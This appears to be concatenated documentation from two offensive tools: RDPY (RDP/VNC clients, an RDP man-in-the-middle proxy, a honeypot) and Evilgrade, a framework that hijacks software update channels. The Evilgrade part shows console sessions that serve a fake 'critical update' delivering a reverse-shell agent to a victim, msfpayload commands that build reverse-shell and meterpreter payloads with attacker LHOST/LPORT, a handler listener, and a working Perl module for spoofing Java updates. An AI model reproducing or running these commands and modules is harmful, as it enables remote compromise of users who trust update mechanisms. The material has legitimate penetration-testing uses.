$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/

$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]

$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]

$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N

$ rdpy-rssplayer.py rss_file_path

from rdpy.protocol.rdp import rdp

class MyRDPFactory(rdp.ClientFactory):

    def clientConnectionLost(self, connector, reason):
        reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        reactor.stop()

    def buildObserver(self, controller, addr):

        class MyObserver(rdp.RDPClientObserver):

            def onReady(self):
                """
                @summary: Call when stack is ready
                """
                #send 'r' key
                self._controller.sendKeyEventUnicode(ord(unicode("r".toUtf8(), encoding="UTF-8")), True)
                #mouse move and click at pixel 200x200
                self._controller.sendPointerEvent(200, 200, 1, true)

            def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
                """
                @summary: Notify bitmap update
                @param destLeft: xmin position
                @param destTop: ymin position
                @param destRight: xmax position because RDP can send bitmap with padding
                @param destBottom: ymax position because RDP can send bitmap with padding
                @param width: width of bitmap
                @param height: height of bitmap
                @param bitsPerPixel: number of bit per pixel
                @param isCompress: use RLE compression
                @param data: bitmap data
                """

            def onSessionReady(self):
          """
          @summary: Windows session is ready
          """

            def onClose(self):
                """
                @summary: Call when stack is close
                """

        return MyObserver(controller)

from twisted.internet import reactor
reactor.connectTCP("XXX.XXX.XXX.XXX", 3389, MyRDPFactory())
reactor.run()

from rdpy.protocol.rdp import rdp

class MyRDPFactory(rdp.ServerFactory):

    def buildObserver(self, controller, addr):

        class MyObserver(rdp.RDPServerObserver):

            def onReady(self):
                """
                @summary: Call when server is ready
                to send and receive messages
                """

            def onKeyEventScancode(self, code, isPressed):
                """
                @summary: Event call when a keyboard event is catch in scan code format
                @param code: scan code of key
                @param isPressed: True if key is down
                @see: rdp.RDPServerObserver.onKeyEventScancode
                """

            def onKeyEventUnicode(self, code, isPressed):
                """
                @summary: Event call when a keyboard event is catch in unicode format
                @param code: unicode of key
                @param isPressed: True if key is down
                @see: rdp.RDPServerObserver.onKeyEventUnicode
                """

            def onPointerEvent(self, x, y, button, isPressed):
                """
                @summary: Event call on mouse event
                @param x: x position
                @param y: y position
                @param button: 1, 2 or 3 button
                @param isPressed: True if mouse button is pressed
                @see: rdp.RDPServerObserver.onPointerEvent
                """

            def onClose(self):
                """
                @summary: Call when human client close connection
                @see: rdp.RDPServerObserver.onClose
                """

        return MyObserver(controller)

from twisted.internet import reactor
reactor.listenTCP(3389, MyRDPFactory())
reactor.run()

from rdpy.protocol.rfb import rfb

class MyRFBFactory(rfb.ClientFactory):

    def clientConnectionLost(self, connector, reason):
        reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        reactor.stop()

    def buildObserver(self, controller, addr):
        class MyObserver(rfb.RFBClientObserver):

            def onReady(self):
                """
                @summary: Event when network stack is ready to receive or send event
                """

            def onUpdate(self, width, height, x, y, pixelFormat, encoding, data):
                """
                @summary: Implement RFBClientObserver interface
                @param width: width of new image
                @param height: height of new image
                @param x: x position of new image
                @param y: y position of new image
                @param pixelFormat: pixefFormat structure in rfb.message.PixelFormat
                @param encoding: encoding type rfb.message.Encoding
                @param data: image data in accordance with pixel format and encoding
                """

            def onCutText(self, text):
                """
                @summary: event when server send cut text event
                @param text: text received
                """

            def onBell(self):
                """
                @summary: event when server send biiip
                """

            def onClose(self):
                """
                @summary: Call when stack is close
                """

        return MyObserver(controller)

from twisted.internet import reactor
reactor.connectTCP("XXX.XXX.XXX.XXX", 3389, MyRFBFactory())
reactor.run()

• Internal DNS access
• ARP spoofing
• DNS Cache Poisoning
• DHCP spoofing
• TCP hijacking
• Wi-Fi Access Point impersonation

• Internal DNS access
• DNS Cache Poisoning

• Freerip 3.30
• Jet photo 4.7.2
• Teamviewer 5.1.9385
• ISOpen 4.5.0
• Istat.
• Gom 2.1.25.5015
• Atube catcher 1.0.300
• Vidbox 7.5
• Ccleaner 2.30.1130
• Fcleaner 1.2.9.409
• Allmynotes 1.26
• Notepad++ 5.8.2
• Java 1.6.0_22 winxp/win7
• aMSN 0.98.3
• Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
• Mirc 7.14
• Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
• Dap 9.5.0.3
• Winscp 4.2.9
• AutoIt Script 3.3.6.1
• Clamwin 0.96.0.1
• AppTapp Installer 3.11 (Iphone/Itunes)
• getjar (facebook.com)
• Google Analytics Javascript injection
• Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
• Winamp 5.581
• TechTracker (cnet) 1.3.1 (Build 55)
• Nokiasoftware firmware update 2.4.8es - (Windows software)
• Nokia firmware v20.2.011
• BSplayer 2.53.1034
• Apt ( < Ubuntu 10.04 LTS)
• Ubertwitter 4.6 (0.971)
• Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
• Cpan 1.9402
• VirtualBox (3.2.8 )
• Express talk
• Filezilla
• Flashget
• Miranda
• Orbit
• Photoscape.
• Panda Antirootkit
• Skype
• Sunbelt
• Superantispyware
• Trillian <= 5.0.0.26
• Adium 1.3.10 (Sparkle Framework)
• VMware
• more...

• /docs/CHANGES

evilgrade>help
Type 'help command' for more detailed help on a command.
  Commands:
    configure - Configure <module-name> - no help available
    exit      - exits the program
    help      - prints this screen, or help on 'command'
    reload    - Reload to update all the modules - no help available
    restart   - Restart webserver - no help available
    set       - Configure variables - no help available
    show      - Display information of <object>.
    start     - Start webserver - no help available
    status    - Get webserver status - no help available
    stop      - Stop webserver - no help available
    version   - Display framework version. - no help available

  Object:
     options  - Show options of current module.
     vhosts   - Show VirtualHosts of current module.
     modules  - List all modules available for use.
     active   - Show active modules.

evilgrade>show modules

List of modules:
===============

...
...
...

- 63 modules available.

evilgrade>conf sunjava
evilgrade(sunjava)>

evilgrade>show vhosts

Virtual hosts:
=============

[
  "java.sun.com",
  "javadl-esd.sun.com",
  ...
  ...
  ...
]

evilgrade(sunjava)>show options

Display options:
===============

Name = Sun Microsystems Java
Version = 2.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "java.sun.com|javadl-esd.sun.com"

.-------------------------------------------------------------------------------------------------------------------------.
| Name         | Default                                         | Description                                            |
+--------------+-------------------------------------------------+--------------------------------------------------------+
| website      | http://java.com/moreinfolink                    | Website displayed in the update                        |
| enable       |                                               1 | Status                                                 |
| atitle       | Critical vulnerability                          | Title name to be displayed in the systray item popup   |
| arg          |                                                 | Arg passed to Agent                                    |
| adescription | This critical update fix internal vulnerability | Description  to be displayed in the systray item popup |
| description  | This critical update fix internal vulnerability | Description to be displayed during the update          |
| agent        | ./agent/reverseshellsign.exe                    | Agent to inject                                        |
| title        | Critical update                                 | Title name displayed in the update                     |
'--------------+-------------------------------------------------+--------------------------------------------------------'

evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

#### Waiting for victims

evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

evilgrade>show status
Webserver (pid 4134) already running

Users status:
============

.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

evilgrade>configure sunjava
evilgrade(sunjava)>

evilgrade>conf sunjava
evilgrade(sunjava)>

## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>


##
reload    - Reload to get all modules update (to refresh loaded modules, useful on development)
start     - Start webserver
stop      - Stop webserver (fake update server)

evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...


#######################################



Example:
-------
evilgrade>stop
Stopping WEBSERVER  [OK]
Stopping DNSSERVER  [OK]

#######################################

restart   - Restart services (WebServer and DNS Server)
stops and starts again

#######################################

status    - Get webserver and victims status

Example:
-------
evilgrade>show status
Webserver (pid 4134) already running

Users status:
============

.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

#######################################

show      - Display information of <object>.

#######################################

show active    - Display active modules in the webserver

#######################################

show modules    - Display implemented modules

#########################################

show options    - Display modules/global options

Example:
-------

evilgrade>show options

Display options:
===============

.-----------------------------------------------------------------------------------.
| Name        | Default   | Description                                             |
+-------------+-----------+---------------------------------------------------------+
| DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
| DNSPort     |        53 | Listen Name Server port                                 |
| debug       |         1 | Debug mode                                              |
| port        |        80 | Webserver listening port                                |
| sslport     |       443 | Webserver SSL listening port                            |
'-------------+-----------+---------------------------------------------------------'

evilgrade>
evilgrade(notepadplus)>conf vmware
evilgrade(vmware)>show options (without started services)

Display options:
===============

Name = VMware Server
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "www.vmware.com"

.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

evilgrade(vmware)>show options (with started services after setting agent)

Display options:
===============

Name = VMware Server
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "www.vmware.com"

.--------------------------------------------------------------------------------------------------.
| Name        | Default                                                          | Description     |
+-------------+------------------------------------------------------------------+-----------------+
| enable      |                                                                1 | Status          |
| agentmd5    | f80af637642170507bda998b6f2015fa                                 |                 |
| agentsize   |                                                            54576 |                 |
| agent       | ./agent/agent.exe                                                | Agent to inject |
| agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd |                 |
'-------------+------------------------------------------------------------------+-----------------'


#########################################

set       - Configure variables global or modules

Example:
-------

evilgrade>show options


Display options:
===============

.-----------------------------------------------------------------------------------.
| Name        | Default   | Description                                             |
+-------------+-----------+---------------------------------------------------------+
| DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
| DNSPort     |        53 | Listen Name Server port                                 |
| debug       |         0 | Debug mode                                              |
| port        |        80 | Webserver listening port                                |
| sslport     |       443 | Webserver SSL listening port                            |
'-------------+-----------+---------------------------------------------------------'

###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)

evilgrade>set debug 1 #Enable debug
set debug, 1

evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening
set DNSAnswerIp, 192.168.1.4

evilgrade>show options

Display options:
===============

.-------------------------------------------------------------------------------------.
| Name        | Default     | Description                                             |
+-------------+-------------+---------------------------------------------------------+
| DNSEnable   |           1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip  )                                  |
| DNSPort     |          53 | Listen Name Server port                                 |
| debug       |           1 | Debug mode                                              |
| port        |          80 | Webserver listening port                                |
| sslport     |         443 | Webserver SSL listening port                            |
'-------------+-------------+---------------------------------------------------------'


###############################

exit      - exits the program

#######################################

help      - prints this screen, or help on 'command'

#######################################

• Modules Options: Each module has special options, but the "agent" field is always present. The agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation.

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

[team@infobyte]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

[team@infobyte]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E
[*] Started reverse handler on 192.168.100.2:4444
[*] Starting the payload handler...

package modules::sunjava;

use strict;
use Data::Dump qw(dump);

my $base=
{
    'name' => 'Sun Microsystems Java', #name of the module to display in the framework
    'version' => '2.0', #internal module version
    'appver' => '<= 1.6.0_22', #last application version tested with this evilgrade module
    'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ], #author
    'description' => qq{}, #brief description
    'vh' => '(java.sun.com|javadl-esd.sun.com)', #VirtualHosts that the application uses to retrieve information about the update configuration files and update binaries.

    #Then we have the request object's collection
    'request' => [
    #Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com)
        {
        'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/update/1.6.0/map\-m\-1.6.0.xml)', #The required URL, regex friendly
        'type' => 'file', #it's the response type (file|string|agent|install)
         #we can use:
                      #file: response with content file referenced in the "file" option below (./include/sunjava_map.xml)
                      #string: response with a string referenced in the "string" options below
                      #agent:  response with content file referenced in the "agent" options (options section)
                      #install: response with content file referenced in the "file" option below
                        #It's used to know if the fake update was executed
                        #In some update process we can specify a final page after update installed
                        #so we send to a controller page.
        'method' => '', #not implemented yet
        'bin'    => '', #set to 1 if we are going to send a binary file
        'string' => '', #if we have chosen the 'type' string then in this variable we set the response
        'parse' => '', #set to 1 if the file or string need be parsed with options
        'file' => './include/sunjava/sunjava_map.xml'
        },

        {
        'req' => '^/java_update.xml$', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => '',
        'string' => '',
        'parse' => '1',
        'file' => './include/sunjava/sunjava_update.xml'
        },
        {
        'req' => '/x.jnlp', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => '',
        'string' => '',
        #In this case we parse the file
                    'parse' => '1',
        #To parse the file we use special tags, like <%OPTIONAME%> inside the "file" or "string" field
              #This tags are replaced with the values of the options, for example
              #<%TITLE%> will be replaced by 'Critical update'
        'file' => './include/sunjava/x.jnlp'
        },
        {
        'req' => '.jar', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => 1,
        'string' => '',
        'parse' => '',
        'file' => './include/sunjava/JavaPayload/FunnyClass2.jar'
        },

        {
        'req' => '.exe', #regex friendly
        'type' => 'agent', #Here we have an agent type with a binary response
        'bin'    => 1,
        'method' => '', #any
        'string' => '',
        'parse' => '',
        'file' => ''
        }
    ],

    #Options
    #Here we have the options that will be displayed with "show options" inside the current module.
    #This options are used to parse the string or a file using in the responses
    'options' => {  'agent'  => { 'val' => './agent/java/javaws.exe', #The default value
              'desc' => 'Agent to inject'}, #Brief description
        'arg'    => { 'val' => 'http://java.sun.com/x.jnlp"',
              'desc' => 'Arg passed to Agent'},
        'enable' => { 'val' => 1,
              'desc' => 'Status'},

    #The following is a dynamic hidden option,
    #In this case we use the tag <%NAME%> to parse the files and execute perl functions to get randoms values
    #You can use whatever you like in perl, if you're wishing to use more functions check "isrcore/utils.pm"
                    'name'  => { 'val' => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
                                'hidden' => 1,
                          'dynamic' =>1,},

    #All the options depend on the update process. You have to research the possible variables and implement them on your module
    #These are the mostly common update messages, webpages, descriptions, popup messages, title, etc
        'title'  => { 'val' => 'Critical update',
              'desc' => 'Title name displayed in the update'},
        'description' => { 'val' => 'This critical update fix internal vulnerability',
          'desc' => 'Description to be displayed during the update'},
        'atitle'  => { 'val' => 'Critical vulnerability',
               'desc' => 'Title name to be displayed in the systray item popup'},
        'adescription' => { 'val' => 'This critical update fix internal vulnerability',
          'desc' => 'Description  to be displayed in the systray item popup'},
        'website' => { 'val' => 'http://java.com/moreinfolink',
               'desc' => 'Website displayed in the update'}
     }
};

1. Don't forget to run evilgrade with an user that has privileges to create listening sockets, otherwise you won't be able to use evilgrade's Services.
   
2. Everytime you modify a module with evilgrade running don't forget to 'reload' them.
   
3. Set the binary 'agents' before starting services because there are some fields that evilgrade will fill out for you (agentmd5, agentsha256, and agentsize) that can't be done with them already running.
   
4. If you're using a dynamic response with variables such as: <%AGENTSIZE%>, <%AGENTMD5%>, <%URL_FILE%>, <%URL_FILE_EXT%>, or custom ones defined at the options section, don't forget to set parse on 1.
   
5. Same goes for injecting an agent, you must enable de bin flag on 1.
   
6. If you want to make plaintext responses using HTTP use the cheader flag. Example below:
   

        {   'req' => '/sitepath/download/file.zip'
            ,    #regex friendly
            'type'    => 'string',                  #file|string|agent|install
            'method'  => '',                        #any
            'bin'     => '',
            'string'  => '',
            'parse'   => '1',
            'file'    => '',
            'cheader' => "HTTP/1.1 302 Found\r\n"
                . "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
                . "Content-Length: 0 \r\n"
                . "Connection: close \r\n\r\n",
        },

7) To filter via User-Agent, use as an example the Sparkle2 module. In base add  'useragent' => 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped "User-Agent: ".

    Data::Dump
    Digest::MD5
    Time::HiRes
    RPC::XML

sudo apt install cpanminus
sudo cpanm Data::Dump Digest::MD5 Time::HiRes RPC::XML
git clone https://github.com/infobyte/evilgrade
cd evilgrade
./evilgrade

· ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]
· Troopers 2008 [Munich, Germany] [www.troopers08.org]
· Shakacon 2008 [Hawaii, USA] [www.shakacon.org]
· H2HC 2009 [Brazil] [www.h2hc.com.br]
· Blackhat Arsenal & Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]